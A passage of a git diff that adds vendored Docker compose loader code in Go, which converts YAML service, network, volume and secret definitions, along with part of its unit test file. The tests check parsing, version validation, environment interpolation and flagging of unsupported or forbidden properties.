+func GetUnsupportedProperties(configDetails types.ConfigDetails) []string {
+	unsupported := map[string]bool{}
+
+	for _, service := range getServices(getConfigDict(configDetails)) {
+		serviceDict := service.(types.Dict)
+		for _, property := range types.UnsupportedProperties {
+			if _, isSet := serviceDict[property]; isSet {
+				unsupported[property] = true
+			}
+		}
+	}
+
+	return sortedKeys(unsupported)
+}
+
+func sortedKeys(set map[string]bool) []string {
+	var keys []string
+	for key := range set {
+		keys = append(keys, key)
+	}
+	sort.Strings(keys)
+	return keys
+}
+
+// GetDeprecatedProperties returns the list of any deprecated properties that
+// are used in the compose files.
+func GetDeprecatedProperties(configDetails types.ConfigDetails) map[string]string {
+	return getProperties(getServices(getConfigDict(configDetails)), types.DeprecatedProperties)
+}
+
+func getProperties(services types.Dict, propertyMap map[string]string) map[string]string {
+	output := map[string]string{}
+
+	for _, service := range services {
+		if serviceDict, ok := service.(types.Dict); ok {
+			for property, description := range propertyMap {
+				if _, isSet := serviceDict[property]; isSet {
+					output[property] = description
+				}
+			}
+		}
+	}
+
+	return output
+}
+
+// ForbiddenPropertiesError is returned when there are properties in the Compose
+// file that are forbidden.
+type ForbiddenPropertiesError struct {
+	Properties map[string]string
+}
+
+func (e *ForbiddenPropertiesError) Error() string {
+	return "Configuration contains forbidden properties"
+}
+
+// TODO: resolve multiple files into a single config
+func getConfigDict(configDetails types.ConfigDetails) types.Dict {
+	return configDetails.ConfigFiles[0].Config
+}
+
+func getServices(configDict types.Dict) types.Dict {
+	if services, ok := configDict["services"]; ok {
+		if servicesDict, ok := services.(types.Dict); ok {
+			return servicesDict
+		}
+	}
+
+	return types.Dict{}
+}
+
+func transform(source map[string]interface{}, target interface{}) error {
+	data := mapstructure.Metadata{}
+	config := &mapstructure.DecoderConfig{
+		DecodeHook: mapstructure.ComposeDecodeHookFunc(
+			transformHook,
+			mapstructure.StringToTimeDurationHookFunc()),
+		Result:   target,
+		Metadata: &data,
+	}
+	decoder, err := mapstructure.NewDecoder(config)
+	if err != nil {
+		return err
+	}
+	err = decoder.Decode(source)
+	// TODO: log unused keys
+	return err
+}
+
+func transformHook(
+	source reflect.Type,
+	target reflect.Type,
+	data interface{},
+) (interface{}, error) {
+	switch target {
+	case reflect.TypeOf(types.External{}):
+		return transformExternal(data)
+	case reflect.TypeOf(make(map[string]string, 0)):
+		return transformMapStringString(source, target, data)
+	case reflect.TypeOf(types.UlimitsConfig{}):
+		return transformUlimits(data)
+	case reflect.TypeOf(types.UnitBytes(0)):
+		return loadSize(data)
+	case reflect.TypeOf(types.ServiceSecretConfig{}):
+		return transformServiceSecret(data)
+	}
+	switch target.Kind() {
+	case reflect.Struct:
+		return transformStruct(source, target, data)
+	}
+	return data, nil
+}
+
+// keys needs to be converted to strings for jsonschema
+// TODO: don't use types.Dict
+func convertToStringKeysRecursive(value interface{}, keyPrefix string) (interface{}, error) {
+	if mapping, ok := value.(map[interface{}]interface{}); ok {
+		dict := make(types.Dict)
+		for key, entry := range mapping {
+			str, ok := key.(string)
+			if !ok {
+				var location string
+				if keyPrefix == "" {
+					location = "at top level"
+				} else {
+					location = fmt.Sprintf("in %s", keyPrefix)
+				}
+				return nil, fmt.Errorf("Non-string key %s: %#v", location, key)
+			}
+			var newKeyPrefix string
+			if keyPrefix == "" {
+				newKeyPrefix = str
+			} else {
+				newKeyPrefix = fmt.Sprintf("%s.%s", keyPrefix, str)
+			}
+			convertedEntry, err := convertToStringKeysRecursive(entry, newKeyPrefix)
+			if err != nil {
+				return nil, err
+			}
+			dict[str] = convertedEntry
+		}
+		return dict, nil
+	}
+	if list, ok := value.([]interface{}); ok {
+		var convertedList []interface{}
+		for index, entry := range list {
+			newKeyPrefix := fmt.Sprintf("%s[%d]", keyPrefix, index)
+			convertedEntry, err := convertToStringKeysRecursive(entry, newKeyPrefix)
+			if err != nil {
+				return nil, err
+			}
+			convertedList = append(convertedList, convertedEntry)
+		}
+		return convertedList, nil
+	}
+	return value, nil
+}
+
+func loadServices(servicesDict types.Dict, workingDir string) ([]types.ServiceConfig, error) {
+	var services []types.ServiceConfig
+
+	for name, serviceDef := range servicesDict {
+		serviceConfig, err := loadService(name, serviceDef.(types.Dict), workingDir)
+		if err != nil {
+			return nil, err
+		}
+		services = append(services, *serviceConfig)
+	}
+
+	return services, nil
+}
+
+func loadService(name string, serviceDict types.Dict, workingDir string) (*types.ServiceConfig, error) {
+	serviceConfig := &types.ServiceConfig{}
+	if err := transform(serviceDict, serviceConfig); err != nil {
+		return nil, err
+	}
+	serviceConfig.Name = name
+
+	if err := resolveEnvironment(serviceConfig, serviceDict, workingDir); err != nil {
+		return nil, err
+	}
+
+	if err := resolveVolumePaths(serviceConfig.Volumes, workingDir); err != nil {
+		return nil, err
+	}
+
+	return serviceConfig, nil
+}
+
+func resolveEnvironment(serviceConfig *types.ServiceConfig, serviceDict types.Dict, workingDir string) error {
+	environment := make(map[string]string)
+
+	if envFileVal, ok := serviceDict["env_file"]; ok {
+		envFiles := loadStringOrListOfStrings(envFileVal)
+
+		var envVars []string
+
+		for _, file := range envFiles {
+			filePath := absPath(workingDir, file)
+			fileVars, err := opts.ParseEnvFile(filePath)
+			if err != nil {
+				return err
+			}
+			envVars = append(envVars, fileVars...)
+		}
+
+		for k, v := range opts.ConvertKVStringsToMap(envVars) {
+			environment[k] = v
+		}
+	}
+
+	for k, v := range serviceConfig.Environment {
+		environment[k] = v
+	}
+
+	serviceConfig.Environment = environment
+
+	return nil
+}
+
+func resolveVolumePaths(volumes []string, workingDir string) error {
+	for i, mapping := range volumes {
+		parts := strings.SplitN(mapping, ":", 2)
+		if len(parts) == 1 {
+			continue
+		}
+
+		if strings.HasPrefix(parts[0], ".") {
+			parts[0] = absPath(workingDir, parts[0])
+		}
+		parts[0] = expandUser(parts[0])
+
+		volumes[i] = strings.Join(parts, ":")
+	}
+
+	return nil
+}
+
+// TODO: make this more robust
+func expandUser(path string) string {
+	if strings.HasPrefix(path, "~") {
+		return strings.Replace(path, "~", os.Getenv("HOME"), 1)
+	}
+	return path
+}
+
+func transformUlimits(data interface{}) (interface{}, error) {
+	switch value := data.(type) {
+	case int:
+		return types.UlimitsConfig{Single: value}, nil
+	case types.Dict:
+		ulimit := types.UlimitsConfig{}
+		ulimit.Soft = value["soft"].(int)
+		ulimit.Hard = value["hard"].(int)
+		return ulimit, nil
+	default:
+		return data, fmt.Errorf("invalid type %T for ulimits", value)
+	}
+}
+
+func loadNetworks(source types.Dict) (map[string]types.NetworkConfig, error) {
+	networks := make(map[string]types.NetworkConfig)
+	err := transform(source, &networks)
+	if err != nil {
+		return networks, err
+	}
+	for name, network := range networks {
+		if network.External.External && network.External.Name == "" {
+			network.External.Name = name
+			networks[name] = network
+		}
+	}
+	return networks, nil
+}
+
+func loadVolumes(source types.Dict) (map[string]types.VolumeConfig, error) {
+	volumes := make(map[string]types.VolumeConfig)
+	err := transform(source, &volumes)
+	if err != nil {
+		return volumes, err
+	}
+	for name, volume := range volumes {
+		if volume.External.External && volume.External.Name == "" {
+			volume.External.Name = name
+			volumes[name] = volume
+		}
+	}
+	return volumes, nil
+}
+
+// TODO: remove duplicate with networks/volumes
+func loadSecrets(source types.Dict, workingDir string) (map[string]types.SecretConfig, error) {
+	secrets := make(map[string]types.SecretConfig)
+	if err := transform(source, &secrets); err != nil {
+		return secrets, err
+	}
+	for name, secret := range secrets {
+		if secret.External.External && secret.External.Name == "" {
+			secret.External.Name = name
+			secrets[name] = secret
+		}
+		if secret.File != "" {
+			secret.File = absPath(workingDir, secret.File)
+		}
+	}
+	return secrets, nil
+}
+
+func absPath(workingDir string, filepath string) string {
+	if path.IsAbs(filepath) {
+		return filepath
+	}
+	return path.Join(workingDir, filepath)
+}
+
+func transformStruct(
+	source reflect.Type,
+	target reflect.Type,
+	data interface{},
+) (interface{}, error) {
+	structValue, ok := data.(map[string]interface{})
+	if !ok {
+		// FIXME: this is necessary because of convertToStringKeysRecursive
+		structValue, ok = data.(types.Dict)
+		if !ok {
+			panic(fmt.Sprintf(
+				"transformStruct called with non-map type: %T, %s", data, data))
+		}
+	}
+
+	var err error
+	for i := 0; i < target.NumField(); i++ {
+		field := target.Field(i)
+		fieldTag := field.Tag.Get("compose")
+
+		yamlName := toYAMLName(field.Name)
+		value, ok := structValue[yamlName]
+		if !ok {
+			continue
+		}
+
+		structValue[yamlName], err = convertField(
+			fieldTag, reflect.TypeOf(value), field.Type, value)
+		if err != nil {
+			return nil, fmt.Errorf("field %s: %s", yamlName, err.Error())
+		}
+	}
+	return structValue, nil
+}
+
+func transformMapStringString(
+	source reflect.Type,
+	target reflect.Type,
+	data interface{},
+) (interface{}, error) {
+	switch value := data.(type) {
+	case map[string]interface{}:
+		return toMapStringString(value), nil
+	case types.Dict:
+		return toMapStringString(value), nil
+	case map[string]string:
+		return value, nil
+	default:
+		return data, fmt.Errorf("invalid type %T for map[string]string", value)
+	}
+}
+
+func convertField(
+	fieldTag string,
+	source reflect.Type,
+	target reflect.Type,
+	data interface{},
+) (interface{}, error) {
+	switch fieldTag {
+	case "":
+		return data, nil
+	case "healthcheck":
+		return loadHealthcheck(data)
+	case "list_or_dict_equals":
+		return loadMappingOrList(data, "="), nil
+	case "list_or_dict_colon":
+		return loadMappingOrList(data, ":"), nil
+	case "list_or_struct_map":
+		return loadListOrStructMap(data, target)
+	case "string_or_list":
+		return loadStringOrListOfStrings(data), nil
+	case "list_of_strings_or_numbers":
+		return loadListOfStringsOrNumbers(data), nil
+	case "shell_command":
+		return loadShellCommand(data)
+	case "size":
+		return loadSize(data)
+	case "-":
+		return nil, nil
+	}
+	return data, nil
+}
+
+func transformExternal(data interface{}) (interface{}, error) {
+	switch value := data.(type) {
+	case bool:
+		return map[string]interface{}{"external": value}, nil
+	case types.Dict:
+		return map[string]interface{}{"external": true, "name": value["name"]}, nil
+	case map[string]interface{}:
+		return map[string]interface{}{"external": true, "name": value["name"]}, nil
+	default:
+		return data, fmt.Errorf("invalid type %T for external", value)
+	}
+}
+
+func transformServiceSecret(data interface{}) (interface{}, error) {
+	switch value := data.(type) {
+	case string:
+		return map[string]interface{}{"source": value}, nil
+	case types.Dict:
+		return data, nil
+	case map[string]interface{}:
+		return data, nil
+	default:
+		return data, fmt.Errorf("invalid type %T for external", value)
+	}
+
+}
+
+func toYAMLName(name string) string {
+	nameParts := fieldNameRegexp.FindAllString(name, -1)
+	for i, p := range nameParts {
+		nameParts[i] = strings.ToLower(p)
+	}
+	return strings.Join(nameParts, "_")
+}
+
+func loadListOrStructMap(value interface{}, target reflect.Type) (interface{}, error) {
+	if list, ok := value.([]interface{}); ok {
+		mapValue := map[interface{}]interface{}{}
+		for _, name := range list {
+			mapValue[name] = nil
+		}
+		return mapValue, nil
+	}
+
+	return value, nil
+}
+
+func loadListOfStringsOrNumbers(value interface{}) []string {
+	list := value.([]interface{})
+	result := make([]string, len(list))
+	for i, item := range list {
+		result[i] = fmt.Sprint(item)
+	}
+	return result
+}
+
+func loadStringOrListOfStrings(value interface{}) []string {
+	if list, ok := value.([]interface{}); ok {
+		result := make([]string, len(list))
+		for i, item := range list {
+			result[i] = fmt.Sprint(item)
+		}
+		return result
+	}
+	return []string{value.(string)}
+}
+
+func loadMappingOrList(mappingOrList interface{}, sep string) map[string]string {
+	if mapping, ok := mappingOrList.(types.Dict); ok {
+		return toMapStringString(mapping)
+	}
+	if list, ok := mappingOrList.([]interface{}); ok {
+		result := make(map[string]string)
+		for _, value := range list {
+			parts := strings.SplitN(value.(string), sep, 2)
+			if len(parts) == 1 {
+				result[parts[0]] = ""
+			} else {
+				result[parts[0]] = parts[1]
+			}
+		}
+		return result
+	}
+	panic(fmt.Errorf("expected a map or a slice, got: %#v", mappingOrList))
+}
+
+func loadShellCommand(value interface{}) (interface{}, error) {
+	if str, ok := value.(string); ok {
+		return shellwords.Parse(str)
+	}
+	return value, nil
+}
+
+func loadHealthcheck(value interface{}) (interface{}, error) {
+	if str, ok := value.(string); ok {
+		return append([]string{"CMD-SHELL"}, str), nil
+	}
+	return value, nil
+}
+
+func loadSize(value interface{}) (int64, error) {
+	switch value := value.(type) {
+	case int:
+		return int64(value), nil
+	case string:
+		return units.RAMInBytes(value)
+	}
+	panic(fmt.Errorf("invalid type for size %T", value))
+}
+
+func toMapStringString(value map[string]interface{}) map[string]string {
+	output := make(map[string]string)
+	for key, value := range value {
+		output[key] = toString(value)
+	}
+	return output
+}
+
+func toString(value interface{}) string {
+	if value == nil {
+		return ""
+	}
+	return fmt.Sprint(value)
+}
diff --git a/vendor/github.com/docker/docker/cli/compose/loader/loader_test.go b/vendor/github.com/docker/docker/cli/compose/loader/loader_test.go
new file mode 100644
index 0000000000..f7fee89ede
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/compose/loader/loader_test.go
@@ -0,0 +1,800 @@
+package loader
+
+import (
+	"fmt"
+	"io/ioutil"
+	"os"
+	"sort"
+	"testing"
+	"time"
+
+	"github.com/docker/docker/cli/compose/types"
+	"github.com/stretchr/testify/assert"
+)
+
+func buildConfigDetails(source types.Dict) types.ConfigDetails {
+	workingDir, err := os.Getwd()
+	if err != nil {
+		panic(err)
+	}
+
+	return types.ConfigDetails{
+		WorkingDir: workingDir,
+		ConfigFiles: []types.ConfigFile{
+			{Filename: "filename.yml", Config: source},
+		},
+		Environment: nil,
+	}
+}
+
+var sampleYAML = `
+version: "3"
+services:
+  foo:
+    image: busybox
+    networks:
+      with_me:
+  bar:
+    image: busybox
+    environment:
+      - FOO=1
+    networks:
+      - with_ipam
+volumes:
+  hello:
+    driver: default
+    driver_opts:
+      beep: boop
+networks:
+  default:
+    driver: bridge
+    driver_opts:
+      beep: boop
+  with_ipam:
+    ipam:
+      driver: default
+      config:
+        - subnet: 172.28.0.0/16
+`
+
+var sampleDict = types.Dict{
+	"version": "3",
+	"services": types.Dict{
+		"foo": types.Dict{
+			"image":    "busybox",
+			"networks": types.Dict{"with_me": nil},
+		},
+		"bar": types.Dict{
+			"image":       "busybox",
+			"environment": []interface{}{"FOO=1"},
+			"networks":    []interface{}{"with_ipam"},
+		},
+	},
+	"volumes": types.Dict{
+		"hello": types.Dict{
+			"driver": "default",
+			"driver_opts": types.Dict{
+				"beep": "boop",
+			},
+		},
+	},
+	"networks": types.Dict{
+		"default": types.Dict{
+			"driver": "bridge",
+			"driver_opts": types.Dict{
+				"beep": "boop",
+			},
+		},
+		"with_ipam": types.Dict{
+			"ipam": types.Dict{
+				"driver": "default",
+				"config": []interface{}{
+					types.Dict{
+						"subnet": "172.28.0.0/16",
+					},
+				},
+			},
+		},
+	},
+}
+
+var sampleConfig = types.Config{
+	Services: []types.ServiceConfig{
+		{
+			Name:        "foo",
+			Image:       "busybox",
+			Environment: map[string]string{},
+			Networks: map[string]*types.ServiceNetworkConfig{
+				"with_me": nil,
+			},
+		},
+		{
+			Name:        "bar",
+			Image:       "busybox",
+			Environment: map[string]string{"FOO": "1"},
+			Networks: map[string]*types.ServiceNetworkConfig{
+				"with_ipam": nil,
+			},
+		},
+	},
+	Networks: map[string]types.NetworkConfig{
+		"default": {
+			Driver: "bridge",
+			DriverOpts: map[string]string{
+				"beep": "boop",
+			},
+		},
+		"with_ipam": {
+			Ipam: types.IPAMConfig{
+				Driver: "default",
+				Config: []*types.IPAMPool{
+					{
+						Subnet: "172.28.0.0/16",
+					},
+				},
+			},
+		},
+	},
+	Volumes: map[string]types.VolumeConfig{
+		"hello": {
+			Driver: "default",
+			DriverOpts: map[string]string{
+				"beep": "boop",
+			},
+		},
+	},
+}
+
+func TestParseYAML(t *testing.T) {
+	dict, err := ParseYAML([]byte(sampleYAML))
+	if !assert.NoError(t, err) {
+		return
+	}
+	assert.Equal(t, sampleDict, dict)
+}
+
+func TestLoad(t *testing.T) {
+	actual, err := Load(buildConfigDetails(sampleDict))
+	if !assert.NoError(t, err) {
+		return
+	}
+	assert.Equal(t, serviceSort(sampleConfig.Services), serviceSort(actual.Services))
+	assert.Equal(t, sampleConfig.Networks, actual.Networks)
+	assert.Equal(t, sampleConfig.Volumes, actual.Volumes)
+}
+
+func TestLoadV31(t *testing.T) {
+	actual, err := loadYAML(`
+version: "3.1"
+services:
+  foo:
+    image: busybox
+    secrets: [super]
+secrets:
+  super:
+    external: true
+`)
+	if !assert.NoError(t, err) {
+		return
+	}
+	assert.Equal(t, len(actual.Services), 1)
+	assert.Equal(t, len(actual.Secrets), 1)
+}
+
+func TestParseAndLoad(t *testing.T) {
+	actual, err := loadYAML(sampleYAML)
+	if !assert.NoError(t, err) {
+		return
+	}
+	assert.Equal(t, serviceSort(sampleConfig.Services), serviceSort(actual.Services))
+	assert.Equal(t, sampleConfig.Networks, actual.Networks)
+	assert.Equal(t, sampleConfig.Volumes, actual.Volumes)
+}
+
+func TestInvalidTopLevelObjectType(t *testing.T) {
+	_, err := loadYAML("1")
+	assert.Error(t, err)
+	assert.Contains(t, err.Error(), "Top-level object must be a mapping")
+
+	_, err = loadYAML("\"hello\"")
+	assert.Error(t, err)
+	assert.Contains(t, err.Error(), "Top-level object must be a mapping")
+
+	_, err = loadYAML("[\"hello\"]")
+	assert.Error(t, err)
+	assert.Contains(t, err.Error(), "Top-level object must be a mapping")
+}
+
+func TestNonStringKeys(t *testing.T) {
+	_, err := loadYAML(`
+version: "3"
+123:
+  foo:
+    image: busybox
+`)
+	assert.Error(t, err)
+	assert.Contains(t, err.Error(), "Non-string key at top level: 123")
+
+	_, err = loadYAML(`
+version: "3"
+services:
+  foo:
+    image: busybox
+  123:
+    image: busybox
+`)
+	assert.Error(t, err)
+	assert.Contains(t, err.Error(), "Non-string key in services: 123")
+
+	_, err = loadYAML(`
+version: "3"
+services:
+  foo:
+    image: busybox
+networks:
+  default:
+    ipam:
+      config:
+        - 123: oh dear
+`)
+	assert.Error(t, err)
+	assert.Contains(t, err.Error(), "Non-string key in networks.default.ipam.config[0]: 123")
+
+	_, err = loadYAML(`
+version: "3"
+services:
+  dict-env:
+    image: busybox
+    environment:
+      1: FOO
+`)
+	assert.Error(t, err)
+	assert.Contains(t, err.Error(), "Non-string key in services.dict-env.environment: 1")
+}
+
+func TestSupportedVersion(t *testing.T) {
+	_, err := loadYAML(`
+version: "3"
+services:
+  foo:
+    image: busybox
+`)
+	assert.NoError(t, err)
+
+	_, err = loadYAML(`
+version: "3.0"
+services:
+  foo:
+    image: busybox
+`)
+	assert.NoError(t, err)
+}
+
+func TestUnsupportedVersion(t *testing.T) {
+	_, err := loadYAML(`
+version: "2"
+services:
+  foo:
+    image: busybox
+`)
+	assert.Error(t, err)
+	assert.Contains(t, err.Error(), "version")
+
+	_, err = loadYAML(`
+version: "2.0"
+services:
+  foo:
+    image: busybox
+`)
+	assert.Error(t, err)
+	assert.Contains(t, err.Error(), "version")
+}
+
+func TestInvalidVersion(t *testing.T) {
+	_, err := loadYAML(`
+version: 3
+services:
+  foo:
+    image: busybox
+`)
+	assert.Error(t, err)
+	assert.Contains(t, err.Error(), "version must be a string")
+}
+
+func TestV1Unsupported(t *testing.T) {
+	_, err := loadYAML(`
+foo:
+  image: busybox
+`)
+	assert.Error(t, err)
+}
+
+func TestNonMappingObject(t *testing.T) {
+	_, err := loadYAML(`
+version: "3"
+services:
+  - foo:
+      image: busybox
+`)
+	assert.Error(t, err)
+	assert.Contains(t, err.Error(), "services must be a mapping")
+
+	_, err = loadYAML(`
+version: "3"
+services:
+  foo: busybox
+`)
+	assert.Error(t, err)
+	assert.Contains(t, err.Error(), "services.foo must be a mapping")
+
+	_, err = loadYAML(`
+version: "3"
+networks:
+  - default:
+      driver: bridge
+`)
+	assert.Error(t, err)
+	assert.Contains(t, err.Error(), "networks must be a mapping")
+
+	_, err = loadYAML(`
+version: "3"
+networks:
+  default: bridge
+`)
+	assert.Error(t, err)
+	assert.Contains(t, err.Error(), "networks.default must be a mapping")
+
+	_, err = loadYAML(`
+version: "3"
+volumes:
+  - data:
+      driver: local
+`)
+	assert.Error(t, err)
+	assert.Contains(t, err.Error(), "volumes must be a mapping")
+
+	_, err = loadYAML(`
+version: "3"
+volumes:
+  data: local
+`)
+	assert.Error(t, err)
+	assert.Contains(t, err.Error(), "volumes.data must be a mapping")
+}
+
+func TestNonStringImage(t *testing.T) {
+	_, err := loadYAML(`
+version: "3"
+services:
+  foo:
+    image: ["busybox", "latest"]
+`)
+	assert.Error(t, err)
+	assert.Contains(t, err.Error(), "services.foo.image must be a string")
+}
+
+func TestValidEnvironment(t *testing.T) {
+	config, err := loadYAML(`
+version: "3"
+services:
+  dict-env:
+    image: busybox
+    environment:
+      FOO: "1"
+      BAR: 2
+      BAZ: 2.5
+      QUUX:
+  list-env:
+    image: busybox
+    environment:
+      - FOO=1
+      - BAR=2
+      - BAZ=2.5
+      - QUUX=
+`)
+	assert.NoError(t, err)
+
+	expected := map[string]string{
+		"FOO":  "1",
+		"BAR":  "2",
+		"BAZ":  "2.5",
+		"QUUX": "",
+	}
+
+	assert.Equal(t, 2, len(config.Services))
+
+	for _, service := range config.Services {
+		assert.Equal(t, expected, service.Environment)
+	}
+}
+
+func TestInvalidEnvironmentValue(t *testing.T) {
+	_, err := loadYAML(`
+version: "3"
+services:
+  dict-env:
+    image: busybox
+    environment:
+      FOO: ["1"]
+`)
+	assert.Error(t, err)
+	assert.Contains(t, err.Error(), "services.dict-env.environment.FOO must be a string, number or null")
+}
+
+func TestInvalidEnvironmentObject(t *testing.T) {
+	_, err := loadYAML(`
+version: "3"
+services:
+  dict-env:
+    image: busybox
+    environment: "FOO=1"
+`)
+	assert.Error(t, err)
+	assert.Contains(t, err.Error(), "services.dict-env.environment must be a mapping")
+}
+
+func TestEnvironmentInterpolation(t *testing.T) {
+	config, err := loadYAML(`
+version: "3"
+services:
+  test:
+    image: busybox
+    labels:
+      - home1=$HOME
+      - home2=${HOME}
+      - nonexistent=$NONEXISTENT
+      - default=${NONEXISTENT-default}
+networks:
+  test:
+    driver: $HOME
+volumes:
+  test:
+    driver: $HOME
+`)
+
+	assert.NoError(t, err)
+
+	home := os.Getenv("HOME")
+
+	expectedLabels := map[string]string{
+		"home1":       home,
+		"home2":       home,
+		"nonexistent": "",
+		"default":     "default",
+	}
+
+	assert.Equal(t, expectedLabels, config.Services[0].Labels)
+	assert.Equal(t, home, config.Networks["test"].Driver)
+	assert.Equal(t, home, config.Volumes["test"].Driver)
+}
+
+func TestUnsupportedProperties(t *testing.T) {
+	dict, err := ParseYAML([]byte(`
+version: "3"
+services:
+  web:
+    image: web
+    build: ./web
+    links:
+      - bar
+  db:
+    image: db
+    build: ./db
+`))
+	assert.NoError(t, err)
+
+	configDetails := buildConfigDetails(dict)
+
+	_, err = Load(configDetails)
+	assert.NoError(t, err)
+
+	unsupported := GetUnsupportedProperties(configDetails)
+	assert.Equal(t, []string{"build", "links"}, unsupported)
+}
+
+func TestDeprecatedProperties(t *testing.T) {
+	dict, err := ParseYAML([]byte(`
+version: "3"
+services:
+  web:
+    image: web
+    container_name: web
+  db:
+    image: db
+    container_name: db
+    expose: ["5434"]
+`))
+	assert.NoError(t, err)
+
+	configDetails := buildConfigDetails(dict)
+
+	_, err = Load(configDetails)
+	assert.NoError(t, err)
+
+	deprecated := GetDeprecatedProperties(configDetails)
+	assert.Equal(t, 2, len(deprecated))
+	assert.Contains(t, deprecated, "container_name")
+	assert.Contains(t, deprecated, "expose")
+}
+
+func TestForbiddenProperties(t *testing.T) {
+	_, err := loadYAML(`
+version: "3"
+services:
+  foo:
+    image: busybox
+    volumes:
+      - /data
+    volume_driver: some-driver
+  bar:
+    extends:
+      service: foo
+`)
+
+	assert.Error(t, err)
+	assert.IsType(t, &ForbiddenPropertiesError{}, err)
+	fmt.Println(err)
+	forbidden := err.(*ForbiddenPropertiesError).Properties
+
+	assert.Equal(t, 2, len(forbidden))
+	assert.Contains(t, forbidden, "volume_driver")
+	assert.Contains(t, forbidden, "extends")
+}
+
+func durationPtr(value time.Duration) *time.Duration {
+	return &value
+}
+
+func int64Ptr(value int64) *int64 {
+	return &value
+}
+
+func uint64Ptr(value uint64) *uint64 {
+	return &value
+}
+
+func TestFullExample(t *testing.T) {
+	bytes, err := ioutil.ReadFile("full-example.yml")
+	assert.NoError(t, err)
+
+	config, err := loadYAML(string(bytes))
+	if !assert.NoError(t, err) {
+		return
+	}
+
+	workingDir, err := os.Getwd()
+	assert.NoError(t, err)
+
+	homeDir := os.Getenv("HOME")
+	stopGracePeriod := time.Duration(20 * time.Second)
+
+	expectedServiceConfig := types.ServiceConfig{
+		Name: "foo",
+
+		CapAdd:        []string{"ALL"},
+		CapDrop:       []string{"NET_ADMIN", "SYS_ADMIN"},
+		CgroupParent:  "m-executor-abcd",
+		Command:       []string{"bundle", "exec", "thin", "-p", "3000"},
+		ContainerName: "my-web-container",
+		DependsOn:     []string{"db", "redis"},
+		Deploy: types.DeployConfig{
+			Mode:     "replicated",
+			Replicas: uint64Ptr(6),
+			Labels:   map[string]string{"FOO": "BAR"},
+			UpdateConfig: &types.UpdateConfig{
+				Parallelism:     uint64Ptr(3),
+				Delay:           time.Duration(10 * time.Second),
+				FailureAction:   "continue",
+				Monitor:         time.Duration(60 * time.Second),
+				MaxFailureRatio: 0.3,
+			},
+			Resources: types.Resources{
+				Limits: &types.Resource{
+					NanoCPUs:    "0.001",
+					MemoryBytes: 50 * 1024 * 1024,
+				},
+				Reservations: &types.Resource{
+					NanoCPUs:    "0.0001",
+					MemoryBytes: 20 * 1024 * 1024,
+				},
+			},
+			RestartPolicy: &types.RestartPolicy{
+				Condition:   "on_failure",
+				Delay:       durationPtr(5 * time.Second),
+				MaxAttempts: uint64Ptr(3),
+				Window:      durationPtr(2 * time.Minute),
+			},
+			Placement: types.Placement{
+				Constraints: []string{"node=foo"},
+			},
+		},
+		Devices:    []string{"/dev/ttyUSB0:/dev/ttyUSB0"},
+		DNS:        []string{"8.8.8.8", "9.9.9.9"},
+		DNSSearch:  []string{"dc1.example.com", "dc2.example.com"},
+		DomainName: "foo.com",
+		Entrypoint: []string{"/code/entrypoint.sh", "-p", "3000"},
+		Environment: map[string]string{
+			"RACK_ENV":       "development",
+			"SHOW":           "true",
+			"SESSION_SECRET": "",
+			"FOO":            "1",
+			"BAR":            "2",
+			"BAZ":            "3",
+		},
+		Expose: []string{"3000", "8000"},
+		ExternalLinks: []string{
+			"redis_1",
+			"project_db_1:mysql",
+			"project_db_1:postgresql",
+		},
+		ExtraHosts: map[string]string{
+			"otherhost": "50.31.209.229",
+			"somehost":  "162.242.195.82",
+		},
+		HealthCheck: &types.HealthCheckConfig{
+			Test: []string{
+				"CMD-SHELL",
+				"echo \"hello world\"",
+			},
+			Interval: "10s",
+			Timeout:  "1s",
+			Retries:  uint64Ptr(5),
+		},
+		Hostname: "foo",
+		Image:    "redis",
+		Ipc:      "host",
+		Labels: map[string]string{
+			"com.example.description": "Accounting webapp",
+			"com.example.number":      "42",
+			"com.example.empty-label": "",
+		},
+		Links: []string{
+			"db",
+			"db:database",
+			"redis",
+		},
+		Logging: &types.LoggingConfig{
+			Driver: "syslog",
+			Options: map[string]string{
+				"syslog-address": "tcp://192.168.0.42:123",
+			},
+		},
+		MacAddress:  "02:42:ac:11:65:43",
+		NetworkMode: "container:0cfeab0f748b9a743dc3da582046357c6ef497631c1a016d28d2bf9b4f899f7b",
+		Networks: map[string]*types.ServiceNetworkConfig{
+			"some-network": {
+				Aliases:     []string{"alias1", "alias3"},
+				Ipv4Address: "",
+				Ipv6Address: "",
+			},
+			"other-network": {
+				Ipv4Address: "172.16.238.10",
+				Ipv6Address: "2001:3984:3989::10",
+			},
+			"other-other-network": nil,
+		},
+		Pid: "host",
+		Ports: []string{
+			"3000",
+			"3000-3005",
+			"8000:8000",
+			"9090-9091:8080-8081",
+			"49100:22",
+			"127.0.0.1:8001:8001",
+			"127.0.0.1:5000-5010:5000-5010",
+		},
+		Privileged: true,
+		ReadOnly:   true,
+		Restart:    "always",
+		SecurityOpt: []string{
+			"label=level:s0:c100,c200",
+			"label=type:svirt_apache_t",
+		},
+		StdinOpen:       true,
+		StopSignal:      "SIGUSR1",
+		StopGracePeriod: &stopGracePeriod,
+		Tmpfs:           []string{"/run", "/tmp"},
+		Tty:             true,
+		Ulimits: map[string]*types.UlimitsConfig{
+			"nproc": {
+				Single: 65535,
+			},
+			"nofile": {
+				Soft: 20000,
+				Hard: 40000,
+			},
+		},
+		User: "someone",
+		Volumes: []string{
+			"/var/lib/mysql",
+			"/opt/data:/var/lib/mysql",
+			fmt.Sprintf("%s:/code", workingDir),
+			fmt.Sprintf("%s/static:/var/www/html", workingDir),
+			fmt.Sprintf("%s/configs:/etc/configs/:ro", homeDir),
+			"datavolume:/var/lib/mysql",
+		},
+		WorkingDir: "/code",
+	}
+
+	assert.Equal(t, []types.ServiceConfig{expectedServiceConfig}, config.Services)
+
+	expectedNetworkConfig := map[string]types.NetworkConfig{
+		"some-network": {},
+
+		"other-network": {
+			Driver: "overlay",
+			DriverOpts: map[string]string{
+				"foo": "bar",
+				"baz": "1",
+			},
+			Ipam: types.IPAMConfig{
+				Driver: "overlay",
+				Config: []*types.IPAMPool{
+					{Subnet: "172.16.238.0/24"},
+					{Subnet: "2001:3984:3989::/64"},
+				},
+			},
+		},
+
+		"external-network": {
+			External: types.External{
+				Name:     "external-network",
+				External: true,
+			},
+		},
+
+		"other-external-network": {
+			External: types.External{
+				Name:     "my-cool-network",
+				External: true,
+			},
+		},
+	}
+
+	assert.Equal(t, expectedNetworkConfig, config.Networks)
+
+	expectedVolumeConfig := map[string]types.VolumeConfig{
+		"some-volume": {},
+		"other-volume": {
+			Driver: "flocker",
+			DriverOpts: map[string]string{
+				"foo": "bar",
+				"baz": "1",
+			},
+		},
+		"external-volume": {
+			External: types.External{
